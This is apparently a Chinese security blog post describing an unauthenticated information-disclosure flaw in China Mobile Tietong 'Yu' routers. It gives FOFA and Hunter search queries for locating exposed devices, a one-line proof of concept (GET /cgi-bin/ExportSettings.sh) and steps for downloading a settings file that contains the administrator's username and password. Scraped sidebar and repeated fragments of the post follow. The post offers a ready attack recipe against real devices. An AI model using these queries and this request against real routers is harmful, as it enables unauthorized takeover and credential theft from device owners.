中移铁通禹路由 ExportSettings 敏感信息泄露漏洞

漏洞描述：

该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证，导致攻击者能够未授权获取到路由器设置信息，包含了后台管理员用户的账号和密码

fofa: title="互联世界物联未来-登录"

鹰图: web.body="互联世界物联未来-登录"

POC: GET /cgi-bin/ExportSettings.sh

漏洞复现：

fofa搜索，共有799条资产

访问资产IP，在URL后拼接/cgi-bin/ExportSettings.sh，可以下载信息文件

使用记事本查看，获取到了管理员登录账号和密码

posted @ 2024-05-14 08:44 LeouMaster 阅读(91) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 公交IC卡收单管理系统信息泄露漏洞

· 网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞

· 中国移动禹路由ExportSettings.sh敏感信息泄露漏洞

· 电信网关配置管理系统漏洞

· 荷兰宽带数据泄露

阅读排行：
· 单线程的Redis速度为什么快？
· 展开说说关于C#中ORM框架的用法！
· Pantheons：用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么退出登录或修改密码无法使 token 失效

公告

昵称： LeouMaster
园龄： 1年
粉丝： 0
关注： 0

+加关注

2025年3月

日

一

二

三

四

五

六

LeouMaster的博客

安全小菜鸡-安服仔一枚

中移铁通禹路由 ExportSettings 敏感信息泄露漏洞

漏洞描述：

fofa: title="互联世界物联未来-登录"

鹰图: web.body="互联世界物联未来-登录"

POC: GET /cgi-bin/ExportSettings.sh

漏洞复现：

公告

搜索

常用链接

随笔分类

随笔档案

阅读排行榜

推荐排行榜

LeouMaster的博客

安全小菜鸡-安服仔一枚

中移铁通禹路由 ExportSettings 敏感信息泄露漏洞

漏洞描述：

fofa: title="互联世界 物联未来-登录"

鹰图: web.body="互联世界 物联未来-登录"

POC: GET /cgi-bin/ExportSettings.sh

漏洞复现：

公告

搜索

常用链接

随笔分类

随笔档案

阅读排行榜

推荐排行榜

fofa: title="互联世界物联未来-登录"

鹰图: web.body="互联世界物联未来-登录"